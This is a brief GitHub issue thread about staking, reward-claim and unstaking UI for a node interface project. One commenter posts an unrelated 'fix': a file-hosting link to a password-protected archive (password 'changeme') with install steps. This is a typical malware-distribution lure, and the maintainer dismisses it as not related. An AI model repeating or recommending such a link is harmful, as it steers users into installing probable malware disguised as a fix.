### ISSUE TITLE
Staking, claim reward, un staking ui

### ISSUE THREAD

**Issue by abuvanth** [cyberfly-io/cyberfly-node-ui#9]

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by abuvanth** [comment]
Not related

**Comment by abuvanth** [comment]
done
